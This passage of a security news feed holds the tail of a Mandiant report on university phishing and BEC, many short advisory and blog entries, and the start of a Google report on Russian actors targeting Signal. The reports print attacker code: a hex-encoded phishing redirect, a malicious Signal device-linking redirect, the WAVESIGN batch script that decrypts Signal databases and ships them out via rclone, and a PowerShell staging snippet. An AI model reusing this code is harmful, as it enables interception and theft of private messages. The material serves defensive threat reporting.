from two separate university portals”, a conflict which, if not resolved, will lead to interruption in service at both universities. Figure 3: Example Google Form phish These Google Forms phishing campaigns are not just limited to targeting login credentials. In several instances, Mandiant observed threat actors attempting to obtain financial institution details. Your school has collaborated with to streamline fund distribution to students. ensures the quickest, most dependable, and secure method for disbursing Emergency Grants to eligible students. Unfortunately, we've identified an outstanding issue regarding the distribution of your financial aid through . We kindly request that you review and, if necessary, update your information within the net 24 hours. Failing to address this promptly may result in delays in receiving your funds. Figure 4: Example Google Form phish After successfully compromising and propagating additional phishes using the compromised environment, the threat actor then uses the victim’s infrastructure to host a similar campaign targeting future victims. In some cases, the Google Form link was shut down and then repurposed to further the attacker’s objectives. Case Study 2: Website Cloning and Redirection This campaign involves a sophisticated phishing attack where threat actors cloned a university website, mimicking the legitimate login portal. However, this cloned website involved a series of redirects, specifically targeting mobile devices.  The embedded JavaScript performs a “mobile check” and user-agent string verification and performed the following hex-encoded redirect: if (window.mobileCheck()) {
 window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74 \x6c\x79\x2e\x74\x6f\x64\x61\x79\x2f\x4a\x4e\x78\x30\x72\x37";
 } Figure 5: JavaScript Hex-encoded redirect This JavaScript checks to determine if the user is on a mobile device. If they are, it redirects them to one of several possible follow-on URLs. These are two examples: hxxp://cutly[.]today/JNx0r7 hxxp://kutly[.]win/Nyq0r4 Case Study 3: Two-Step Phishing Campaign Targeting Staff and Students Google’s Workspace Trust and Safety team also observed a two-step phishing campaign targeting staff and students. First, attackers send a phishing email to faculty and staff. The emails are designed to entice faculty and staff to provide their login credentials in order to view a document about a raise or bonus. Figure 6: Example of phishing email targeting faculty and staff Next, attackers use login credentials provided by faculty and staff to hijack their account and email phishing forms to students. These forms are designed to look like job applications, and phish for personal and financial information. Figure 7: Example of phishing form emailed to students Understanding Payment Redirection Attacks Payment redirection attacks via Business Email Compromise (BEC) are a sophisticated form of financial fraud. In these attacks, cyber threat actors gain unauthorized access to a business email account and exploit it to redirect payments meant for legitimate recipients into their own accounts. While these attacks often involve the diversion of large transfers, there have been instances where attackers divert small amounts (typically 5-10%) to lower the likelihood of detection. This outlier tactic allows them to steal funds gradually, making it more challenging to detect unauthorized transactions. Figure 8: Payment redirection attacks Initial Compromise: Attackers often begin by gaining access to a legitimate email account through phishing, social engineering, or exploiting vulnerabilities. A common phishing technique involves using online surveys or other similar platforms to create convincing but fraudulent login pages or forms. When unsuspecting employees enter their credentials, attackers capture them and gain unauthorized access.   Reconnaissance: Once they have access to the email account, attackers closely monitor communications to understand the organization’s financial processes, the relationships with vendors, and the typical language used in financial transactions. This reconnaissance phase is crucial for the attackers to craft convincing fraudulent emails that appear authentic to their victims.   Impersonation and Execution: Armed with the information gathered during reconnaissance, attackers impersonate the compromised user or create look-alike email addresses. The TA then sends emails to employees, vendors, or clients, instructing them to change payment details for an upcoming transaction. Believing these requests to be legitimate, recipients comply, and the funds are redirected to accounts controlled by the attackers.   Withdrawal and Laundering: After the funds are diverted, attackers quickly withdraw or move the money across multiple accounts to make recovery difficult. The types of funds being stolen can vary widely and include financial aid such as FAFSA, refunds, scholarships, payroll, and other large transactions like vendor payments or grants. This diversity in targeted funds complicates efforts by organizations and law enforcement to trace and recover the stolen money, as each category may involve different institutions and processes.   The Impact of Payment Redirection Attacks The consequences of a successful payment redirection attack can be severe: Financial Losses: Organizations may lose substantial amounts of money, potentially running into millions of dollars, depending on the size of the transactions.  Reputational Damage: Clients and partners affected by these attacks may lose trust in the organization, which can harm long-term business relationships and brand reputation.   Operational Disruption: The aftermath of an attack often involves extensive investigations, coordination with financial institutions and law enforcement, and implementing enhanced security measures, all of which can disrupt normal business operations.   Mitigating Payment Redirection Attacks To protect against payment redirection attacks, Mandiant recommends a multi-layered approach focusing on prevention, detection, and response: Implement Multi-Factor Authentication (MFA): Requiring MFA for accessing email accounts adds an additional layer of security. Even if an attacker obtains a user’s credentials, they would still need the second factor to gain access, significantly reducing the risk of account compromise. Mandiant has observed many universities, which require MFA for current faculty/staff/students, but not for alumni accounts. While alumni accounts aren’t necessarily at risk of payment redirection attacks, Mandiant has identified instances where alumni accounts have been leveraged to access other user accounts in the environment. Conduct Employee Training: Regular training sessions can help employees recognize phishing attempts and suspicious emails. Training should emphasize vigilance against phishing forms hosted on platforms like Google Forms, and stress the importance of verifying unusual requests, especially those involving financial transactions or changes in payment details. If a Google Forms page seems suspicious, report it as phishing. Establish Payment Verification Protocols: Organizations should have strict procedures for verifying changes in payment information. For example, a policy that requires confirmation of changes via a known phone number or a separate communication channel can help ensure that any alterations are legitimate.   Use Canary Tokens for Detection: Deploying canary tokens, which are unique identifiers embedded in web pages or documents, can serve as an early warning system. If attackers scrape legitimate web pages to host them maliciously on their infrastructure, these tokens trigger alerts, notifying security teams of potential compromise or unauthorized data access.   Use Advanced Email Security Solutions: Deploying advanced email filtering and monitoring solutions can help detect and block malicious emails. These tools can analyze email metadata, check for domain anomalies, and identify patterns indicative of BEC attempts. Built-in Protections with Gmail: Employs AI, threat signals, and Safe Browsing to block 99.9% of spam, phishing, and malware, while also detecting more malware than traditional antivirus and preventing suspicious account sign-ins. Develop a robust Incident Response Plan: A well-defined incident response plan specifically addressing BEC scenarios enables organizations to act swiftly when an attack is detected. This plan should include procedures for containing the breach, notifying affected parties, and collaborating with financial institutions and law enforcement to recover lost funds.   Limit the number of emails a standard user can send in a day: Implementing a policy that restricts the number of emails a standard user can send daily provides additional safeguards in preventing the mass dissemination of phishing emails or malicious content from compromised accounts. This limit can act as a safety net, reducing the potential impact of a compromised account and making it harder for attackers to carry out large-scale phishing campaigns.  Context-Aware Access Monitoring: Utilize context-aware access monitoring to enhance security by analyzing the context of each login attempt. This includes  evaluating factors such as the user's location, device, and behavior patterns. If an access attempt deviates from established norms, such as an unusual login location or device, additional verification steps can be triggered. This helps detect and prevent unauthorized access, particularly in cases where credentials may have been compromised. Detection To assist the wider community in hunting and identifying activity outlined in this blog post, we have included a subset of these indicators of compromise (IOCs) in this post, and in a GTI Collection for registered users.

https://cloud.google.com/blog/topics/threat-intelligence/phishing-targeting-higher-education/
Dragos Named a Leader in CPS Protection Platforms, Focused on Protecting OT from Cyber Disruption
2025-02-24T13:00:00Z | 1740402000

The 2025 Gartner® Magic Quadrant™ for Cyber-Physical Systems (CPS) Protection Platforms1 is the first-ever Magic Quadrant for this category and... The post Dragos Named a Leader in CPS Protection Platforms, Focused on Protecting OT from Cyber Disruption first appeared on Dragos.

https://www.dragos.com/blog/dragos-named-a-leader-in-gartner-magic-quadrant-for-cps-protection-platforms/
Laurie Anderson: Building an ARK | Starmus highlights
2025-02-24T10:00:00Z | 1740391200

The pioneering multi-media artist reveals the creative process behind her stage show called ARK, which challenges audiences to reflect on some of the most pressing issues of our times

https://www.welivesecurity.com/en/we-live-science/laurie-anderson-building-ark-starmus-highlights/
Robots Refresher: introducing a new series
2025-02-24T10:00:00Z | 1740391200

Every now and then we get questions about robots.txt, robots meta tags, and the control functionality that they offer. Following our December series on crawling, we thought this would be the perfect time to put together a light refresher. So, if you're curious about these controls, follow along in this new blog post series!

https://developers.google.com/search/blog/2025/02/intro-robots-refresher
Security Alert (A25-02-18): Multiple Vulnerabilities in Microsoft Edge
2025-02-24T04:00:00Z | 1740369600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
How Security Leaders Defend Their First- and Third-Party Attack Surfaces
2025-02-24T00:00:00Z | 1740355200

Learn how security leaders defend against risks to their first- and third-party attack surfaces.

https://www.recordedfuture.com/blog/how-security-leaders-defend-their-attack-surface
GreyNoise Observes Active Exploitation of Cisco Vulnerabilities Tied to Salt Typhoon Attacks
2025-02-24T00:00:00Z | 1740355200

GreyNoise has observed exploitation attempts targeting two Cisco vulnerabilities, CVE-2023-20198 and CVE-2018-0171. CVE-2023-20198 is being actively exploited by over 110 malicious IPs, primarily from Bulgaria, Brazil, and Singapore, while CVE-2018-0171 has seen exploitation attempts from two malicious IPs traced to Switzerland and the United States. These CVEs were referenced in recent reports on Salt Typhoon, a Chinese state-sponsored threat group, though GreyNoise is not attributing the observed exploitation to Salt Typhoon.

https://www.greynoise.io/blog/greynoise-observes-active-exploitation-of-cisco-vulnerabilities-tied-to-salt-typhoon-attacks
Цільова активність UAC-0212 у відношенні розробників та постачальників рішень АСУТП з метою здійснення кібератак на об'єкти критичної інфраструктури України (CERT-UA#13702)
2025-02-23T10:51:51Z | 1740307911

Починаючи з другої половини 2024 року було відмічено застосування нових тактик, технік та процедур, що, серед іншого, передбачали відправку жертві PDF-документу з посиланням, відвідування якого, у поєднанні з експлуатацією вразливості CVE-2024-38213, призводило до завантаження на комп'ютер LNK-файлу (розширення "pdf.lnk"), запуск якого призводив до виконання PowerShell-команди, що забезпечувала завантаження та відображення документу-приманки, а також завантаження, забезпечення персистентності (гілка "Run") та запуск EXE/DLL файлів.

https://cert.gov.ua/article/6282517
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) – 07/2025
2025-02-22T16:00:41Z | 1740240041

This week we cover topics such as romance fraud and how to prepare for disruption in the cyber world.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-072025
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) – 07/2025
2025-02-22T16:00:41Z | 1740240041

This week we cover topics such as romance fraud and how to prepare for disruption in the cyber world.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-072025
NETSCOUT Recognized by Frost & Sullivan with the 2025 Global Competitive Strategy Leadership Award
2025-02-21T19:08:22Z | 1740164902

NETSCOUT is honored to be recognized by Frost & Sullivan with the 2025 Global Competitive Strategy Leadership Award for best practices in the global next-generation visibility platform industry. NETSCOUT’s Visibility Without Borders strategy, based on the company’s innovative nGenius Enterprise Performance Management...

https://www.netscout.com/blog/netscout-recognized-frost-sullivan-2025-global-competitive
CrazyHunter Ransomware Attack on Makai Hospital
2025-02-21T18:00:00Z | 1740160800

On February 9, 2025, Makai Memorial Hospital in Taiwan suffered a crippling ransomware attack that spanned multiple days, disrupting operations and encrypting critical patient data. The attack, attributed to the Hunter Ransom Group and its CrazyHunter ransomware, affected over 600 computers and led to an emergency response from the Ministry of Health and Welfare. The attackers infiltrated the hospital's network, leveraged Active Directory (AD) misconfigurations, and used Bring-Your-Own-Vulnerable-Driver (BYOVD) techniques to escalate privileges and distribute the ransomware via Group Policy Objects (GPOs).

https://www.threatstop.com/blog/crazyhunter-ransomware-attack-on-makai-hospital
Do You Really Need a Data Scientist?
2025-02-21T13:53:43Z | 1740146023

You've probably heard a lot recently about machine learning (ML) and artificial intelligence operations (AIOps) and how network operators are looking to improve the efficiency of their networks by adopting AI for chatbots to help with customer care; accelerate a transition to the Dark NOC for hands-off, automated...

https://www.netscout.com/blog/do-you-really-need-data-scientist
Threat Hunt Playbook
2025-02-21T13:41:12Z | 1740145272

https://cert.lv/en/2025/02/threat-hunt-playbook
Vulnerability in Wyn Enterprise software
2025-02-21T11:00:00Z | 1740135600

Privilege escalation vulnerability (CVE-2024-9150) has been found in Wyn Enterprise software.

https://cert.pl/en/posts/2025/02/CVE-2024-9150/
Censorship as a Service | Leak Reveals Public-Private Collaboration to Monitor Chinese Cyberspace
2025-02-21T10:55:35Z | 1740135335

Data leak reveals how a top tier cybersecurity vendor helps the PRC enforce content monitoring and manipulation of public opinion in China.

https://www.sentinelone.com/labs/censorship-as-a-service-leak-reveals-public-private-collaboration-to-monitor-chinese-cyberspace/
Bettercap on Android: A Portable Network Security Toolkit
2025-02-21T09:20:14Z | 1740129614

Bettercap is a powerful and versatile tool created by Simone Margaritelli AKA @evilsocket for network security analysis and penetration testing. Often referred to as the Swiss Army knife of network security, it comes packed with features like Wi-Fi and Bluetooth scanning, spoofing, and session hijacking. At the time of writing, bettercap remains one of the […] The post Bettercap on Android: A Portable Network Security Toolkit first appeared on Mobile Hacker.

https://www.mobile-hacker.com/2025/02/21/bettercap-on-android-a-portable-network-security-toolkit/
The $1.5B Bybit Hack: The Era of Operational Security Failures Has Arrived
2025-02-21T05:00:00Z | 1740114000

The $1.5B Bybit Hack demonstrates how the Era of Operational Security Failures has arrived, and most cryptocurrency companies are not prepared for its implications.

https://blog.trailofbits.com/2025/02/21/the-1.5b-bybit-hack-the-era-of-operational-security-failures-has-arrived/
Don’t recurse on untrusted input
2025-02-21T05:00:00Z | 1740114000

We developed a simple CodeQL query to find denial-of-service (DoS) vulnerabilities in several high-profile Java projects.

https://blog.trailofbits.com/2025/02/21/dont-recurse-on-untrusted-input/
Relatórios sobre Setores dos Operadores de Serviços Essenciais
2025-02-21T00:00:00Z | 1740096000

Está disponível um conjunto de Relatórios produzidos no âmbito do Observatório de Cibersegurança, que analisam, de um modo transversal, o estado da cibersegurança nos setores dos Operadores de Serviços Essenciais (OSE), definidos ainda no âmbito da Lei n.º 46/2018 (Regime Jurídico de Segurança do Ciberespaço).Estes documentos contêm recomendações gerais para todos os OSE e recomendações específicas, em função de cada um dos setores/subsetores, considerando as boas práticas internacionais e as necessidades identificadas. O que é um OSE? O Regime Jurídico de Segurança do Ciberespaço define um Operador de um Serviço Essencial como uma entidade pública ou privada que presta um serviço essencial para a manutenção de atividades societais ou económicas cruciais, que dependa de redes e sistemas de informação e em relação ao qual a ocorrência de um incidente possa ter efeitos perturbadores relevantes na prestação desse serviço. Quais os setores identificados? Energia; Transportes; Bancário; Infraestruturas do mercado financeiro; Saúde; Fornecimento e distribuição de água potável; Infraestruturas digitais. O que foi considerado na análise setorial? Impacto socioeconómico; Especificidades tecnológicas; Ameaças; Capacitação; Investimento em cibersegurança; RJSC e legislação setorial; Standards e boas práticas aplicáveis; Desafios; Recomendações. Saiba mais sobre o Relatório geral e consulte o documento que analisa cada setor.

https://dyn.cncs.gov.pt/pt/detalhe/art/135914/relatorios-sobre-setores-dos-operadores-de-servicos-essenciais
Die Entwicklung der Datensicherheit: Von traditioneller DLP zu DSPM
2025-02-20T20:52:40Z | 1740084760

Data security has always been a paramount concern for enterprises. However, the rapid digitization of businesses and the increasing complexity of data environments have made traditional security measures inadequate. The post The Evolution of Data Security: From Traditional DLP to DSPM appeared first on Skyhigh Security.

https://www.skyhighsecurity.com/industry-perspectives/the-evolution-of-data-security-from-traditional-dlp-to-dspm.html
Guidance on securely configuring network protocols (ITSP.40.062)
2025-02-20T17:31:08Z | 1740072668

https://cyber.gc.ca/en/guidance/guidance-securely-configuring-network-protocols-itsp40062
CVE-2025-1001
2025-02-20T16:14:00Z | 1740068040

CWE-295 IMPROPER CERTIFICATE VALIDATION: The affected product is vulnerable due to failure of the update mechanism to verify the update server's certificate which could allow an attacker to alter network traffic and carry out a machine-in-the-middle attack (MITM). An attacker could modify the server's response and deliver a malicious update to the user. Medixant recommends users download the v2025.1 or later version of their software.

https://claroty.com/team82/disclosure-dashboard/cve-2025-1001
Fake job offers target software developers with infostealers
2025-02-20T14:11:28Z | 1740060688

A North Korea-aligned activity cluster tracked by ESET as DeceptiveDevelopment drains victims' crypto wallets and steals their login details from web browsers and password managers

https://www.welivesecurity.com/en/videos/fake-job-offers-target-coders-infostealers/
CERT.LV Director participates in the UN Open-ended Working Group side event on strengthening national cybersecurity and incident response capacity
2025-02-20T14:08:55Z | 1740060535

This week, on February 18th, in New York, Latvia, the Dominican Republic, the Republic of Indonesia, and UNIDIR (United Nations Institute for Disarmament Research) co-organized a thematic event focused on strengthening national cybersecurity and incident response capacity.

https://cert.lv/en/2025/02/cert-lv-director-participates-in-the-un-open-ended-working-group-side-event-on-strengthening-national-cybersecurity-and-incident-response-capacity
Security alert CVE-2025-25064: Stormshield Products Response
2025-02-20T13:46:09Z | 1740059169

A critical vulnerability impacting Zimbra Collaboration has been reported. It has been assigned the reference CVE-2025-25064 and a CVSS 3.1 score of 9.8. It should be noted that proofs of concept of this CVE-2025-25064 are publicly available. The following versions are impacted: Zimbra Collection 10.0.11... The post Security alert CVE-2025-25064: Stormshield Products Response appeared first on Stormshield.

https://www.stormshield.com/news/security-alert-cve-2025-25064-stormshield-products-response/
Security alert CVE-2025-25064: Stormshield Products Response
2025-02-20T13:46:09Z | 1740059169

A critical vulnerability impacting Zimbra Collaboration has been reported. It has been assigned the reference CVE-2025-25064 and a CVSS 3.1 score of 9.8. It should be noted that proofs of concept of this CVE-2025-25064 are publicly available. The following versions are impacted: Zimbra Collection 10.0.11... The post Security alert CVE-2025-25064: Stormshield Products Response appeared first on Stormshield.

https://www.stormshield.com/news/security-alert-cve-2025-25064-stormshield-products-response/
Shadow Repeater:AI-enhanced manual testing
2025-02-20T13:20:19Z | 1740057619

Have you ever wondered how many vulnerabilities you've missed by a hair's breadth, due to a single flawed choice? We've just released Shadow Repeater, which enhances your manual testing with AI-powere

https://portswigger.net/research/shadow-repeater-ai-enhanced-manual-testing
LSA Secrets: revisiting secretsdump
2025-02-20T13:04:00Z | 1740056640

https://www.synacktiv.com/publications/lsa-secrets-revisiting-secretsdump.html
Cisco and BT Group: A partnership fit for future challenges
2025-02-20T13:00:00Z | 1740056400

The telco world is under pressure. But working hand in hand with Cisco, BT Group is AI ready and more energy efficient. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m02/cisco-and-bt-group-a-partnership-fit-for-future-challenges.html
Accelerate Your Business Success with Akamai Enhanced Partner Portal
2025-02-20T13:00:00Z | 1740056400

https://www.akamai.com/blog/partners/2025/feb/accelerate-with-akamai-enhanced-partner-portal
Vulnerability in DocsGPT software
2025-02-20T11:00:00Z | 1740049200

Command Injection vulnerability has been found in Arc53 DocsGPT software (CVE-2025-0868).

https://cert.pl/en/posts/2025/02/CVE-2025-0868/
DeceptiveDevelopment targets freelance developers
2025-02-20T10:00:00Z | 1740045600

ESET researchers analyzed a campaign delivering malware bundled with job interview challenges

https://www.welivesecurity.com/en/eset-research/deceptivedevelopment-targets-freelance-developers/
Building on Success: Latvia and Canada unveil a refined Threat Hunt Workshop
2025-02-20T09:04:45Z | 1740042285

In February 2025, the Cyber Incident Response Institution, CERT.LV, the Latvian Ministry of Defence, and the Canadian Armed Forces Cyber Command conducted their unique Threat Hunt Workshop. The workshop welcomed 30 participants from NATO nations, drawing cybersecurity professionals from diverse backgrounds.

https://cert.lv/en/2025/02/building-on-success-latvia-and-canada-unveil-a-refined-threat-hunt-workshop
Clavister Selected as Supplier by a Major European Defence Company
2025-02-20T08:54:56Z | 1740041696

20 February 2025 – Örnsköldsvik, Sweden – Clavister, a leader in European cybersecurity for mission-critical applications, announced today that it has been selected as supplier by a major European defence… Read more The post Clavister Selected as Supplier by a Major European Defence Company appeared first on Clavister. About Clavister Clavister is a leading European cybersecurity vendor with over 20 years of experience. Seated in Sweden, the company has customers—communication service providers, governments, enterprises and managed security service providers (MSSPs)—in more than 150 countries. Clavister provides unique security solutions to protect their digital assets and secure business continuity. The stock, Clavister Holding AB, is listed at NASDAQ First North under short name CLAV.

https://www.clavister.com/clavister-selected-as-supplier-by-a-major-european-defence-company/
SPAWNCHIMERA Malware: The Chimera Spawning from Ivanti Connect Secure Vulnerability
2025-02-20T06:00:00Z | 1740031200

In January 2025, Ivanti published an adv...

https://blogs.jpcert.or.jp/en/2025/02/spawnchimera.html
Security Alert (A25-02-17): Multiple Vulnerabilities in Cisco Products
2025-02-20T04:00:00Z | 1740024000

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Emulating AWS S3 SSE-C Ransom for Threat Detection
2025-02-20T00:00:00Z | 1740009600

In this article, we’ll explore how threat actors leverage Amazon S3’s Server-Side Encryption with Customer-Provided Keys (SSE-C) for ransom/extortion operations.

https://www.elastic.co/security-labs/emulating-aws-s3-sse-c
Email Threat Protection for Healthcare: A Case Study
2025-02-19T21:54:09Z | 1740002049

Hospitals and healthcare organizations are being targeted by malicious actors looking to exploit weaknesses in their email systems. For a large hospital in Texas, protecting its employees from advanced threats like spam and phishing has become a major issue. The post Email Threat Protection for Healthcare: A Case Study appeared first on Data443.

https://data443.com/email-threat-protection-for-healthcare-a-case-study/
5 Steps for Solving DORA’s Observability and Security Challenges
2025-02-19T14:58:35Z | 1739977115

Financial institutions are built on trust, but trust is fragile. A single system failure or cybersecurity breach can trigger financial losses, damage brand reputation, and lead to costly regulatory fines—forcing teams to scramble to put out fires. The Digital Operational Resilience Act (DORA) ensures organizations are...

https://www.netscout.com/blog/5-steps-solving-doras-observability-and-security-challenges
GCHQ reflects on the passing of His Royal Highness The Prince Philip, The Duke of Edinburgh
2025-02-19T14:48:25Z | 1739976505

GCHQ and the NCSC reflect on the passing of HRH The Duke of Edinburgh

https://www.ncsc.gov.uk/news/reflections-on-the-passing-of-hrh-prince-philip
What exactly should we be logging?
2025-02-19T14:30:18Z | 1739975418

A structured look at what data to collect for security purposes and when to collect it.

https://www.ncsc.gov.uk/blog-post/what-exactly-should-we-be-logging
Signals of Trouble: Multiple Russia-Aligned Threat Actors Actively Targeting Signal Messenger
2025-02-19T14:00:00Z | 1739973600

Written by: Dan Black Google Threat Intelligence Group (GTIG) has observed increasing efforts from several Russia state-aligned threat actors to compromise Signal Messenger accounts used by individuals of interest to Russia's intelligence services. While this emerging operational interest has likely been sparked by wartime demands to gain access to sensitive government and military communications in the context of Russia's re-invasion of Ukraine, we anticipate the tactics and methods used to target Signal will grow in prevalence in the near-term and proliferate to additional threat actors and regions outside the Ukrainian theater of war. Signal's popularity among common targets of surveillance and espionage activity—such as military personnel, politicians, journalists, activists, and other at-risk communities—has positioned the secure messaging application as a high-value target for adversaries seeking to intercept sensitive information that could fulfill a range of different intelligence requirements. More broadly, this threat also extends to other popular messaging applications such as WhatsApp and Telegram, which are also being actively targeted by Russian-aligned threat groups using similar techniques. In anticipation of a wider adoption of similar tradecraft by other threat actors, we are issuing a public warning regarding the tactics and methods used to date to help build public awareness and help communities better safeguard themselves from similar threats. We are grateful to the team at Signal for their close partnership in investigating this activity. The latest Signal releases on Android and iOS contain hardened features designed to help protect against similar phishing campaigns in the future. Update to the latest version to enable these features. Phishing Campaigns Abusing Signal's "Linked Devices" Feature The most novel and widely used technique underpinning Russian-aligned attempts to compromise Signal accounts is the abuse of the app's legitimate "linked devices" feature that enables Signal to be used on multiple devices concurrently. Because linking an additional device typically requires scanning a quick-response (QR) code, threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and the threat actor in real-time, providing a persistent means to eavesdrop on the victim's secure conversations without the need for full-device compromise. In remote phishing operations observed to date, malicious QR codes have frequently been masked as legitimate Signal resources, such as group invites, security alerts, or as legitimate device pairing instructions from the Signal website. In more tailored remote phishing operations, malicious device-linking QR codes have been embedded in phishing pages crafted to appear as specialized applications used by the Ukrainian military. Beyond remote phishing and malware delivery operations, we have also seen malicious QR codes being used in close-access operations. APT44 (aka Sandworm or Seashell Blizzard, a threat actor attributed by multiple governments to the Main Centre for Special Technologies (GTsST) within Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GU), known commonly as the GRU) has worked to enable forward-deployed Russian military forces to link Signal accounts on devices captured on the battlefield back to actor-controlled infrastructure for follow-on exploitation. Notably, this device-linking concept of operations has proven to be a low-signature form of initial access due to the lack of centralized, technology-driven detections and defenses that can be used to monitor for account compromise via newly linked devices; when successful, there is a high risk that a compromise can go unnoticed for extended periods of time. UNC5792: Modified Signal Group Invites To compromise Signal accounts using the device-linking feature, one suspected Russian espionage cluster tracked as UNC5792 (which partially overlaps with CERT-UA's UAC-0195) has altered legitimate "group invite" pages for delivery in phishing campaigns, replacing the expected redirection to a Signal group with a redirection to a malicious URL crafted to link an actor-controlled device to the victim's Signal account. In these operations, UNC5792 has hosted modified Signal group invitations on actor-controlled infrastructure designed to appear identical to a legitimate Signal group invite. In each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., "sgnl://linkdevice?uuid="), tricking victims into linking their Signal accounts to a device controlled by UNC5792. Figure 1: Example modified Signal group invite hosted on UNC5792-controlled domain "signal-groups[.]tech" function doRedirect() { if (window.location.hash) { var redirect = "sgnl://signal.group/" + window.location.hash document.getElementById('go-to-group').href = redirect window.location = redirect } else { document.getElementById('join-button').innerHTML = "No group found." window.onload = doRedirect Figure 2: Typical legitimate group invite code for redirection to a Signal group function doRedirect() { var redirect = 'sgnl://linkdevice uuid=h_8WKmzwam_jtUeoD_NQyg%3D%3D pub_key=Ba0212mHrGIy4t%2FzCCkKkRKwiS0osyeLF4j1v8DKn%2Fg%2B' //redirect=encodeURIComponent(redirect) document.getElementById('go-to-group').href = redirect window.location = redirect window.onload = doRedirect Figure 3: Example of UNC5792 modified redirect code used to link the victim's device to an actor-controlled Signal instance UNC4221: Custom-Developed Signal Phishing Kit UNC4221 (tracked by CERT-UA as UAC-0185) is an additional Russia-linked threat actor who has actively targeted Signal accounts used by Ukrainian military personnel. The group operates a tailored Signal phishing kit designed to mimic components of the Kropyva application used by the Armed Forces of Ukraine for artillery guidance. Similar to the social engineering approach used by UNC5792, UNC4221 has also attempted to mask its device-linking functionality as an invite to a Signal group from a trusted contact. Different variations of this phishing kit have been observed, including: Phishing websites that redirect victims to secondary phishing infrastructure masquerading as legitimate device-linking instructions provisioned by Signal (Figure 4) Phishing websites with the malicious device-linking QR code directly embedded into the primary Kropyva-themed phishing kit (Figure 5) In earlier operations in 2022, UNC4221 phishing pages were crafted to appear as a legitimate security alert from Signal (Figure 6) Figure 4: Malicious device-linking QR code hosted on UNC4221-controlled domain "signal-confirm[.]site" Figure 5: UNC4221 phishing page mimicking the networking component of Kropyva hosted at "teneta.add-group[.]site". The page invites the user to "Sign in to Signal" (Ukrainian: "Авторизуватись у Signal"), which in turn displays a QR code linked to an UNC4221-controlled Signal instance. Figure 6: Phishing page crafted to appear as a Signal security alert hosted on UNC4221-controlled domain signal-protect[.]host Notably, as a core component of its Signal targeting, UNC4221 has also used a lightweight JavaScript payload tracked as PINPOINT to collect basic user information and geolocation data using the browser's GeoLocation API. In general, we expect to see secure messages and location data to frequently feature as joint targets in future operations of this nature, particularly in the context of targeted surveillance operations or support to conventional military operations. Wider Russian and Belarusian Efforts to Steal Messages From Signal Beyond targeted efforts to link additional actor-controlled devices to victim Signal accounts, multiple known and established regional threat actors have also been observed operating capabilities designed to steal Signal database files from Android and Windows devices. APT44 has been observed operating WAVESIGN, a lightweight Windows Batch script, to periodically query Signal messages from a victim's Signal database and exfiltrate those most recent messages using Rclone (Figure 7). As reported in 2023 by the Security Service of Ukraine (SSU) and the UK's National Cyber Security Centre (NCSC), the Android malware tracked as Infamous Chisel and attributed by the respective organizations to Sandworm, is designed to recursively search for a list of file extensions including the local database for a series of messaging applications, including Signal, on Android devices. Turla, a Russian threat actor attributed by the United States and United Kingdom to Center 16 of the Federal Security Service (FSB) of the Russian Federation, has also operated a lightweight PowerShell script in post-compromise contexts to stage Signal Desktop messages for exfiltration (Figure 8). Extending beyond Russia, Belarus-linked UNC1151 has used the command-line utility Robocopy to stage the contents of file directories used by Signal Desktop to store messages and attachments for later exfiltration (Figure 9). if %proflag%==1 ( C:\ProgramData\Signal\Storage\sqlcipher.exe %new% "PRAGMA key=""x'%key%'"";" ".recover" > NUL copy /y %new% C:\ProgramData\Signal\Storage\Signal\sqlorig\db.sqlite C:\ProgramData\Signal\Storage\rc.exe copy -P -I --log-file=C:\ProgramData\Signal\Storage\rclog.txt --log-level INFO C:\ProgramData\Signal\Storage\Signal\sqlorig si:SignalFresh/sqlorig del C:\ProgramData\Signal\Storage\Signal\log* rmdir /s /q C:\ProgramData\Signal\Storage\sql move C:\ProgramData\Signal\Storage\Signal\sql C:\ProgramData\Signal\Storage\sql ) ELSE ( C:\ProgramData\Signal\Storage\sqlcipher.exe %old% "PRAGMA key=""x'%key%'"";" ".recover" > NUL C:\ProgramData\Signal\Storage\sqlcipher.exe %old% "PRAGMA key=""x'%key%'"";select count(*) from sqlite_master;ATTACH DATABASE '%old_dec%' AS plaintext KEY '';SELECT sqlcipher_export('plaintext');DETACH DATABASE plaintext;" C:\ProgramData\Signal\Storage\sqlcipher.exe %new% "PRAGMA key=""x'%key%'"";" ".recover" > NUL C:\ProgramData\Signal\Storage\sqlcipher.exe %new% "PRAGMA key=""x'%key%'"";select count(*) from sqlite_master;ATTACH DATABASE '%new_dec%' AS plaintext KEY '';SELECT sqlcipher_export('plaintext');DETACH DATABASE plaintext;" C:\ProgramData\Signal\Storage\sqldiff.exe --primarykey --vtab %old_dec% %new_dec% > %diff_name% del /s %old_dec% %new_dec% rmdir /s /q C:\ProgramData\Signal\Storage\sql move C:\ProgramData\Signal\Storage\Signal\sql C:\ProgramData\Signal\Storage\sql powershell -Command "move C:\ProgramData\Signal\Storage\log.tmp C:\ProgramData\Signal\Storage\Signal\log$(Get-Date -f """ddMMyyyyHHmmss""").tmp" ) Figure 7: Code snippet from WAVESIGN used by APT44 to exfiltrate Signal messages $TempPath = $env:tmp $TempPath = $env:temp $ComputerName = $env:computername $DFSRoot = "\\redacted" $RRoot = $DFSRoot + "resource\" $frand = Get-Random -Minimum 1 -Maximum 10000 Get-ChildItem "C:\Users\..\AppData\Roaming\SIGNAL\config.json" | Out-File $treslocal -Append Get-ChildItem "C:\Users\..\AppData\Roaming\SIGNAL\sql\db.sqlite" | Out-File $treslocal -Append Get-ChildItem "C:\Users\..\AppData\Roaming\SIGNAL\config.json" | Out-File $treslocal -Append Get-ChildItem "C:\Users\..\AppData\Roaming\SIGNAL\sql\db.sqlite" | Out-File $treslocal -Append 